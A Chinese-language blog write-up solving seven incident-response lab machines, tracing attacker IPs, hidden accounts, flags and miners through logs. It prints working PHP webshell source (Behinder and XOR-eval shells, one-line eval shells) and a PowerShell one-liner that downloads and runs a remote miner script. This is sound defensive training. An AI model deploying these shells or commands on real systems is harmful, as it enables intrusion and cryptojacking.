前言

最近在学应急，刚好看到知攻善防实验室出品的应急响应靶场，这里记录一下自己的题解过程。

靶场来自：知攻善防实验室

靶场下载链接：

https://pan.quark.cn/s/4b6dffd0c51a

一、 Windows应急响应靶机-Web1

前景需要

小李在值守的过程中，发现有CPU占用飙升，出于胆子小，就立刻将服务器关机，并找来正在吃苕皮的hxd帮他分析。

挑战内容

1. 攻击者的shell密码
2. 攻击者的IP地址
3. 攻击者的隐藏账户名称
4. 攻击者挖矿程序的矿池域名(仅域名)
5. 有实力的可以尝试着修复漏洞

说明

桌面上有一个administrator用户的桌面上解题程序，输入正确答案即可解题。

相关账户密码用户:administrator密码:[email protected]

解题过程

打开虚拟机后先把Windows Defender关闭，否则木马一打开就自动被删了。

1、既然是Windows Server 2022，那么先分析Apache日志：C:phpstudy_proExtensionsApache2.4.39logsaccess.log.1708905600

这就很明显了，木马就是：/content/plugins/tips/shell.php，我们打开这个文件看一看：

<?php@error_reporting(0);session_start();    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond $_SESSION['k']=$key; session_write_close(); $post=file_get_contents("php://input");if(!extension_loaded('openssl')) {  $t="base64_"."decode";  $post=$t($post."");for($i=0;$i<strlen($post);$i++) {        $post[$i] = $post[$i]^$key[$i+1&15];        } }else {  $post=openssl_decrypt($post, "AES128", $key); }    $arr=explode('|',$post);    $func=$arr[0];    $params=$arr[1];classC{publicfunction__invoke($p){eval($p."");}}    @call_user_func(new C(),$params);?>

冰蝎的木马，连接密码就是：rebeyond了。

2、攻击者的IP地址还看Apache日志：192.168.126.1

3、D盾直接就看到了，隐藏账户：hack168$

4、在hack168$用户的桌面发现了Kuang.exe文件：

原本想运行起来，看看外联的地址，但是运行后直接就卡死了，那就只能换种方法了。

在线的沙箱全都试了一遍，分析不出来矿池的域名，只能从挖矿文件本身下手了。

看图标是pyinstaller打包，用pyinstxtractor进行反编译：

得到pyc文件，还要继续反编译：

去找网上的在线反编译网站：

得到了源码文件：

# Visit https://www.lddgo.net/string/pyc-compile-decompile for more information# Version : Python 3.8import multiprocessingimport requestsdefcpu_intensive_task():try:        requests.get('http://wakuang.zhigongshanfang.top', 10, **('timeout',))finally:continuecontinuecontinueif __name__ == '__main__':    cpu_count = multiprocessing.cpu_count()    processes = (lambda.0: [ multiprocessing.Process(cpu_intensive_task, **('target',)) for _ in.0 ])(range(cpu_count))for process in processes:        process.start()for process in processes:        process.join()

那么矿池的域名很明显了：wakuang.zhigongshanfang.top

5、先查看日志分析黑客是如何攻进去的：

192.168.126.1 - - [26/Feb/2024:22:34:28 +0800] "POST /admin/account.php?action=dosignin&s= HTTP/1.1" 302 -……192.168.126.1 - - [26/Feb/2024:22:36:12 +0800] "POST /admin/account.php?action=dosignin&s= HTTP/1.1" 302 -192.168.126.1 - - [26/Feb/2024:22:37:09 +0800] "POST /admin/account.php?action=dosignin&s= HTTP/1.1" 302 -192.168.126.1 - - [26/Feb/2024:22:37:09 +0800] "GET /admin/ HTTP/1.1" 200 18865……192.168.126.1 - - [26/Feb/2024:22:45:57 +0800] "GET /admin/plugin.php?action=del&plugin=tips/tips.php&token=2dac908ae2df3b0237dee7081da123d213176d24 HTTP/1.1" 302 -192.168.126.1 - - [26/Feb/2024:22:45:57 +0800] "GET /admin/plugin.php?activate_del=1 HTTP/1.1" 200 14725192.168.126.1 - - [26/Feb/2024:22:45:57 +0800] "POST /admin/plugin.php?action=check_update HTTP/1.1" 400 94192.168.126.1 - - [26/Feb/2024:22:46:05 +0800] "POST /admin/plugin.php?action=upload_zip HTTP/1.1" 302 -192.168.126.1 - - [26/Feb/2024:22:46:05 +0800] "GET /admin/plugin.php?activate_install=1 HTTP/1.1" 200 16182192.168.126.1 - - [26/Feb/2024:22:46:05 +0800] "POST /admin/plugin.php?action=check_update HTTP/1.1" 400 94192.168.126.1 - - [26/Feb/2024:22:46:08 +0800] "GET /admin/plugin.php?action=active&plugin=tips/tips.php&token=2dac908ae2df3b0237dee7081da123d213176d24 HTTP/1.1" 302 -192.168.126.1 - - [26/Feb/2024:22:46:08 +0800] "GET /admin/plugin.php?active=1 HTTP/1.1" 200 16392192.168.126.1 - - [26/Feb/2024:22:46:08 +0800] "POST /admin/plugin.php?action=check_update HTTP/1.1" 400 94192.168.126.1 - - [26/Feb/2024:22:46:20 +0800] "GET /content/plugins/tips HTTP/1.1" 301 252192.168.126.1 - - [26/Feb/2024:22:46:20 +0800] "GET /content/plugins/tips/ HTTP/1.1" 404 -192.168.126.1 - - [26/Feb/2024:22:46:23 +0800] "GET /content/plugins/tips/shell.php HTTP/1.1" 200 -……192.168.126.1 - - [26/Feb/2024:22:46:35 +0800] "GET /content/plugins/tips/shell.php?888666=619 HTTP/1.1" 200 -

关键日志已经摘出来了，其实已经很明显了，黑客首先是大量的POST请求：/admin/account.php，应该是在爆破密码，登录进去之后访问了plugin.php页面，然后就开始访问shell.php页面了，因此整个流程是：

1、爆破后台账号密码 - 对应管理员弱口令 查看数据库中的后台密码（数据库账号密码在网站根目录的config.php中）： mysql> select uid,username,password from emlog_user;    +-----+----------+------------------------------------+    | uid | username | password                           |    +-----+----------+------------------------------------+    |   1 | admin    | $P$BZFmadazYLJBS3d.neHGpPYIc4uSrj0 |    +-----+----------+------------------------------------+ 密码上cmd5可以查出来，但是需要付费，应该是个弱口令2、进后台后直接在plugin.php上传了木马 - 对应这个页面的文件上传漏洞3、连接木马控制机器，创建了隐藏用户，运行了挖矿程序

弱口令就改成强口令即可，至于文件上传漏洞去搜：emlog v2.2.0后台插件上传漏洞修复即可。

二、 Windows应急响应靶机-Web2

前景需要

小李在某单位驻场值守，深夜12点，甲方已经回家了，小李刚偷偷摸鱼后，发现安全设备有告警，于是立刻停掉了机器开始排查。

挑战内容

1. 攻击者的IP地址（两个）？
2. 攻击者的webshell文件名？
3. 攻击者的webshell密码？
4. 攻击者的伪QQ号？
5. 攻击者的伪服务器IP地址？
6. 攻击者的服务器端口？
7. 攻击者是如何入侵的（选择题）？
8. 攻击者的隐藏用户名？

关于靶机启动

使用Vmware启动即可，如启动错误，请升级至Vmware17.5以上

直接运行桌面上“解题.exe”即可

相关账户密码用户:administrator密码:[email protected]

解题过程

1、既然是Windows server，应该是有web服务的，还是去看日志：C:phpstudy_proExtensionsApache2.4.39logsaccess.log.1709164800

192.168.126.135 - - [29/Feb/2024:12:38:30 +0800] "GET /7AuHIG HTTP/1.1" 404 55771192.168.126.135 - - [29/Feb/2024:12:38:31 +0800] "GET /RQhJhE HTTP/1.1" 404 55771192.168.126.135 - - [29/Feb/2024:12:38:31 +0800] "GET /.Oocso2 HTTP/1.1" 404 55771192.168.126.135 - - [29/Feb/2024:12:38:31 +0800] "GET /z6Ak60/ HTTP/1.1" 404 55771192.168.126.135 - - [29/Feb/2024:12:38:31 +0800] "GET /Mw9a5c.php HTTP/1.1" 404 55771……192.168.126.135 - - [29/Feb/2024:12:39:23 +0800] "GET /.git/logs/head HTTP/1.1" 404 55771192.168.126.135 - - [29/Feb/2024:12:39:33 +0800] "GET /.htaccess-dev HTTP/1.1" 404 55771192.168.126.135 - - [29/Feb/2024:12:39:42 +0800] "GET /wp-admin/ HTTP/1.1" 302 -192.168.126.135 - - [29/Feb/2024:12:40:03 +0800] "GET // HTTP/1.1" 301 -192.168.126.135 - - [29/Feb/2024:12:40:03 +0800] "GET / HTTP/1.1" 200 83648192.168.126.135 - - [29/Feb/2024:12:54:22 +0800] "GET /readme.html HTTP/1.1" 200 7399192.168.126.135 - - [29/Feb/2024:12:54:22 +0800] "GET /wp-admin/css/install.css?ver=20100228 HTTP/1.1" 200 6219192.168.126.135 - - [29/Feb/2024:12:54:22 +0800] "GET /wp-admin/images/wordpress-logo.png HTTP/1.1" 200 2480192.168.126.135 - - [29/Feb/2024:12:54:22 +0800] "GET /wp-admin/images/wordpress-logo.svg?ver=20131107 HTTP/1.1" 200 1521192.168.126.135 - - [29/Feb/2024:13:02:00 +0800] "GET /system.php HTTP/1.1" 200 -

关键日志摘出来了，思路很清楚：

1、爆破后台，找到了/wp-admin2、找到后台后应该是登进去了，不然不会访问到images目录，但是攻击者是怎么知道账号密码的，这里有点疑惑3、上传木马，从日志里没有分析出来攻击者上传木马的方法，突然就在利用system.php这个文件了。

那么IP地址肯定就是：192.168.126.135

第二个IP在apache的日志中没有出现，那么猜测是攻击者通过RDP远程连接利用了另一个IP，查看一下Windows的系统日志，筛选远程登录成功的日志：

那就很清楚了，攻击者的登录IP是：192.168.126.129

2、webshell文件名从apache日志里就分析出来了：system.php

3、找到这个文件：C:phpstudy_proWWWsystem.php

<?php@session_start();@set_time_limit(0);@error_reporting(0);functionencode($D,$K){for($i=0;$i<strlen($D);$i++) {        $c = $K[$i+1&15];        $D[$i] = $D[$i]^$c;    }return $D;}$pass='hack6618';$payloadName='payload';$key='7813d1590d28a7dd';if (isset($_POST[$pass])){    $data=encode(base64_decode($_POST[$pass]),$key);if (isset($_SESSION[$payloadName])){        $payload=encode($_SESSION[$payloadName],$key);if (strpos($payload,"getBasicsInfo")===false){            $payload=encode($payload,$key);        }eval($payload);echo substr(md5($pass.$key),0,16);echo base64_encode(encode(@run($data),$key));echo substr(md5($pass.$key),16);    }else{if (strpos($data,"getBasicsInfo")!==false){            $_SESSION[$payloadName]=encode($data,$key);        }    }}

那密码就很明显了：hack6618

4、伪QQ号刚开始有点不明白哪里会用到，后来想到wordpress，猜想有可能攻击者注册账号可能要输入信息，那就查看一下，结果找了一圈也没有，本来是先跳过了，然后定位文件的时候翻到了这里：C:UsersAdministratorDocumentsTencent Files，有一个文件夹，名字就是QQ号：777888999321

5、黑客登录QQ大概率就是为了传输文件，那就进去看看……进去后看到了frp

frpc.ini里面肯定有服务器的地址：

[common]server_addr = 256.256.66.88server_port = 65536# 这IP和端口跟闹着玩一样

6、端口肯定就是frp里的端口了：65536

7、上面说了，apache日志里是没看到攻击者的入侵方式的，只看到攻击者找到后台就直接利用木马了，仔细想想还有什么方式可以上传木马呢？排除之后就剩ftp了，查看FTP的日志记录：C:phpstudy_proExtensionsFTP0.9.60Logsfzs-2024-02-29.log

(000001) 2024/2/29 12:35:30 - (not logged in) (192.168.126.135)> Connected on port 21, sending welcome message...(000001) 2024/2/29 12:35:30 - (not logged in) (192.168.126.135)> 220 FileZilla Server 0.9.60 beta written by Tim Kosse ([email protected]) Please visit http://sourceforge.(000001) 2024/2/29 12:35:30 - (not logged in) (192.168.126.135)> could not send reply, disconnected.(000002) 2024/2/29 12:42:03 - (not logged in) (192.168.126.135)> Connected on port 21, sending welcome message...(000002) 2024/2/29 12:42:03 - (not logged in) (192.168.126.135)> 220 FileZilla Server 0.9.60 beta written by Tim Kosse ([email protected]) Please visit http://sourceforge.(000003) 2024/2/29 12:42:03 - (not logged in) (192.168.126.135)> Connected on port 21, sending welcome message...(000011) 2024/2/29 12:42:03 - (not logged in) (192.168.126.135)> USER root(000011) 2024/2/29 12:42:03 - (not logged in) (192.168.126.135)> 331 Password required for root(000017) 2024/2/29 12:42:03 - (not logged in) (192.168.126.135)> USER root(000017) 2024/2/29 12:42:03 - (not logged in) (192.168.126.135)> 331 Password required for root(000008) 2024/2/29 12:42:03 - (not logged in) (192.168.126.135)> USER root(000008) 2024/2/29 12:42:03 - (not logged in) (192.168.126.135)> 331 Password required for root(000043) 2024/2/29 12:42:03 - (not logged in) (192.168.126.135)> 530 Login or password incorrect!(000020) 2024/2/29 12:42:03 - (not logged in) (192.168.126.135)> PASS ********(000020) 2024/2/29 12:42:03 - (not logged in) (192.168.126.135)> 530 Login or password incorrect!(000045) 2024/2/29 12:42:03 - (not logged in) (192.168.126.135)> PASS *********……(000138) 2024/2/29 12:48:31 - (not logged in) (192.168.126.135)> PASS ***********(000138) 2024/2/29 12:48:31 - admin (192.168.126.135)> 230 Logged on……(000141) 2024/2/29 13:01:39 - admin (192.168.126.135)> STOR system.php(000141) 2024/2/29 13:01:39 - admin (192.168.126.135)> 150 Opening data channel for file upload to server of "/system.php"(000141) 2024/2/29 13:01:39 - admin (192.168.126.135)> 226 Successfully transferred "/system.php"

那这就很清楚了，先是大量爆破FTP的admin账户的密码，爆破成功后登录进去，传了system.php文件，然后开始用木马。这也解释了上面为什么日志里没看到如何攻击进去的，却突然就开始利用木马了。

然后通过QQ传输了Frp，接下来就是做反向代理，创建隐藏用户

8、隐藏账号，直接用D盾就能看到：hack887$

三、 Windows应急响应靶机-Web3

前景需要

小苕在省护值守中，在灵机一动情况下把设备停掉了，甲方问：为什么要停设备？小苕说：我第六感告诉我，这机器可能被黑了。

挑战内容

1. 攻击者的两个IP地址
2. 隐藏用户名称
3. 黑客遗留下的flag【3个】

说明

本虚拟机的考点不在隐藏用户以及ip地址，仔细找找把。

关于靶机启动

解压后双击.ovf文件，使用Vmware打开，直接导入即可。

相关账户密码：administratorxj@123456

解题过程

1、先看看有没有木马，用D盾扫WWW目录：

那就打开看看吧：

# 404.php<?phpeval($_POST["pass"]); ?># post-safe.php<?phpeval($_POST["pass"]);?># 两个一句话

看看apache日志吧：D:phpstudy_proExtensionsApache2.4.39logsaccess.log.1710201600

192.168.75.129 - - [12/Mar/2024:11:22:50 +0800] "GET /zb_users/theme/aymFreeFive/template/404.php HTTP/1.1" 404 -

因为已经肯定404.php是木马了，因此访问这个文件的肯定是攻击者，全部日志里只有192.168.75.129访问了这个文件，这个肯定是攻击者IP无疑，那么还差一个攻击者IP，我们去RDP日志里看看：

屡试不爽啊，果然找到了攻击者的另一个IP：192.168.75.130，甚至他的隐藏账户都有了：hack6618$

2、攻击者的隐藏账户上面已经出来了，也可以用D盾看：hack6618$

3、既然有隐藏账户，那就去看看这个账户的目录：

# C:Usershack6618$Downloadssystem.batecho ^<?php eval($_POST["pass"]); ?^> > D:phpstudy_proWWWzb_usersthemeaymFreeFivetemplate404.phpecho flag{888666abc}# 第一个flag找到了

第二个flag在数据库中看到了：flag{H@Ck@sec}

# 通过skip-grant-tables连接数据库mysql> select mem_ID,mem_Name,mem_Password,mem_Email,mem_IP,mem_Intro from zbp_member;+--------+----------+----------------------------------+-----------------+----------------+----------------+| mem_ID | mem_Name | mem_Password                     | mem_Email       | mem_IP         | mem_Intro      |+--------+----------+----------------------------------+-----------------+----------------+----------------+|      1 | admin    | 3d3f417b287cc2c0280e396267062164 | [email protected]   | 127.0.0.1      |                ||      2 | Hacker   | 12bfcd08c23e2291338aec8d1636d460 | [email protected] | 192.168.75.130 | flag{H@Ck@sec} |+--------+----------+----------------------------------+-----------------+----------------+----------------+

第三个flag也是在排除各个应急响应的检查项中找到的，最终在任务计划程序中看到了：flag{zgsfsys@sec}

攻击者的入侵轨迹：1、暴力破解管理员密码2、登录后台之后创建了Hack用户2、然后上传网站的插件，构造了带webshell的插件，路径就是/zb_users/theme/aymFreeFive3、访问木马：/zb_users/theme/aymFreeFive/404.php4、连接木马后新建了一个隐藏账户hack6618$5、为hack6618$用户建了一个计划任务，定时执行桌面的system.bat，脚本就是一直生成404.php

四、 Linux应急响应靶机-1

前景需要

小王急匆匆地找到小张，小王说"李哥，我dev服务器被黑了",快救救我！！

挑战内容

1. 黑客的IP地址

2. 遗留下的三个flag

说明

defend/defend

root/defend

解题过程

1、首先是黑客的IP地址，这里原本以为直接查看网络连接就能看到，结果并没有：netstat -ano

然后就看看所有用户的登录时间吧：lastb

猜测这个就是黑客的IP地址：192.168.75.129

标注：这里可能只是碰巧了，官方的题解是查看redis的连接日志（这样才是合理的）。

cat /var/log/redis/redis.log | grep Acc

2、查看历史命令：history

flag{thisismybaby}

3、一项一项排查，最后排查到开机启动项：/etc/rc.d/rc.local，找到了第二个flag

flag{kfcvme50}

4、在查看用户的时候发现有redis用户，猜测黑客有可能是通过redis未授权攻进来的。

查看root/.ssh/authorized_keys，确实有一个公钥，但是没有看到flag。

也没有web目录。

那就查看一下redis的配置文件吧：/etc/redis.conf

拿到第三个flag：flag{P@ssW0rd_redis}

五、 Linux应急响应靶机-2

前景需要

看监控的时候发现webshell告警，领导让你上机检查你可以救救安服仔吗！！

挑战内容

1. 提交攻击者IP
2. 提交攻击者修改的网站后台管理员密码(明文)
3. 提交第一次Webshell的连接URL(http://xxx.xxx.xxx.xx/abcdefg?abcdefg只需要提交abcdefg?abcdefg)
4. 提交Webshell连接密码
5. 提交数据包的flag1
6. 提交攻击者使用的后续上传的木马文件名称
7. 提交攻击者隐藏的flag2
8. 提交攻击者隐藏的flag3

说明

root/Inch@957821.

解题过程

1、既然是webshell告警，肯定有web服务，那就先看一下是什么：ps -ef

nginx的话，日志就是：access.log文件，查找一下：

find / -name access.log# /www/wwwlogs/access.log

那就分析日志吧：

日志中发现192.168.20.1这个IP一直在访问phpmyadmin页面，并且频率很高，大概率就是攻击IP。

2、后台管理员密码肯定是在数据库里了，但是不知道MySQL的密码，那就设置跳过检测：

/etc/my.cnf在[mysqld]下面一行加上skip_grant_tables

然后可以直接连接MySQL，不需要密码。

进来后查看数据库发现有一个kaoshi，查看其中的表，发现有一个x2_user，表中分别有username和userpassword字段，那就查询一下：

mysql> select username,userpassword from x2_user;+-----------------+----------------------------------+| username        | userpassword                     |+-----------------+----------------------------------+| peadmin         | f6f6eb5ace977d7e114377cc7098b7e3 || 教师管理员        | 96e79218965eb72c92a549dd5a330112 || zgsf            | af0c68603004a1b5af4d87a71a813057 || zgsfAdmin       | ed2b3e3ce2425550d8bfdea8b80cc89a |+-----------------+----------------------------------+4 rows in set (0.00 sec)

解密一下，就解出来了两个分别是：

peadmin Network@2020教师管理员 111111

那么密码就是：Network@2020

3、同上，在流量包中过滤HTTP请求后，第一条就是：

连接URL就是：index.php?user-app-register

4、打开流量包，过滤HTTP请求，第一条直接追踪HTTP流：

连接密码就是：Network2020

5、打开流量包，先过滤HTTP请求，发现有个请求是/flag，追踪流看看：

看到了flag：flag1{Network@_2020_Hack}

6、从流量包中看到，请求的路径从index.php?user-app-register变成了version.php，但是这个请求是404，然后就是version2.php，那么可能这个就是木马，追踪流看看：

应该就是冰蝎马，木马文件名就是：version2.php

在tcp.stream eq 27中找到了木马的源文件，冰蝎无疑了：

虽然题目没有涉及到冰蝎的流量解密，但是这里还是记录一下：

冰蝎流量解密

冰蝎加密原理：先aes128，然后base64

默认密钥：e45e329feb5d925b

默认IV：0123456789abcdef

mode：CBC

7、历史命令中看到编辑了：alinotify.php

搜索一下这个文件：

$ find / -name alinotify.php# /www/wwwroot/127.0.0.1/api/alinotify.php# /www/wwwroot/127.0.0.1/.api/alinotify.php

一个一个查看，第一个没有什么有价值的东西，第二个里面有个flag：

$ cat /www/wwwroot/127.0.0.1/.api/alinotify.phpinclude PEPATH.'/lib/init.cls.php';$app = new app(new ginkgo);$app->run();$flag2 = "flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}";?>

8、查看历史命令：cat /root/.bash_history

查看环境变量：env

flag3=flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}

六、 Windows近源攻击

前景需要

小王从某安全大厂被优化掉后，来到了某私立小学当起了计算机老师。某一天上课的时候，发现鼠标在自己动弹，又发现除了某台电脑，其他电脑连不上网络。感觉肯定有学生捣乱，于是开启了应急。

挑战内容

1. 攻击者的外网IP地址
2. 攻击者的内网跳板IP地址
3. 攻击者使用的限速软件的md5大写
4. 攻击者的后门md5大写
5. 攻击者留下的flag

说明

运行桌面上"解题工具.exe"即可

相关账户密码

Administrator

zgsf@2024

解题过程

这个不太懂哟，等搞懂了后面再补充吧！！！

七、Windows挖矿事件

前景需要

机房运维小陈，下班后发现还有工作没完成，然后上机器越用越卡，请你帮他看看原因。

挑战内容

1. 攻击者的IP地址
2. 攻击者开始攻击的时间
3. 攻击者攻击的端口
4. 挖矿程序的md5
5. 后门脚本的md5
6. 矿池地址
7. 钱包地址
8. 攻击者是如何攻击进入的

说明

运行桌面上的解题工具即可。

相关账户密码：

Administrator/zgsf@123

解题过程

1、没有web应用，那么想知道攻击者的IP应该只能从远程登录的情况来看了，先看有没有登录失败的日志：

攻击者IP很清楚了：192.168.115.131

2、开始攻击的时间，那就是这个IP第一次登录失败的时间了：2024-05-21 20:25:22

3、因为有多次的登录失败日志，所以推测这个机器被攻击的的方式应该是RDP密码的暴力破解，那攻击端口就是3389了。

4、这个机器开机后每隔一会就会运行这个程序：

推测就是一个挖矿的计划任务，那么我们先找到它，在C盘里搜索c3pool试试：

还是找到这个文件了，打开看看：

那应该这个就是挖矿程序了：xmrig.exe，计算它的MD5：A79D49F425F95E70DDF0C68C18ABC564

5、既然这个程序会运行，应该就在计划任务或者开机启动里，排查看看：

确实有一个未知文件，打开看看：

powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.bat', $tempfile); & $tempfile 4APXVhukGNiR5kqqVC7jwiVaa5jDxUgPohEtAyuRS1uyeL6K1LkkBy9SKx5W1M7gYyNneusud6A8hKjJCtVbeoFARuQTu4Y; Remove-Item -Force $tempfile"

确实就是上面截图运行的程序，先计算这个文件的HASH：8414900F4C896964497C2CF6552EC4B9

6、矿池地址应该就是systems.bat里的：download.c3pool.org

7、钱包地址那肯定就是systems.bat里面的：4APXVhukGNiR5kqqVC7jwiVaa5jDxUgPohEtAyuRS1uyeL6K1LkkBy9SKx5W1M7gYyNneusud6A8hKjJCtVbeoFARuQTu4Y

8、攻击者入侵的路径，上面推测过了，应该就是暴力破解了RDP的密码。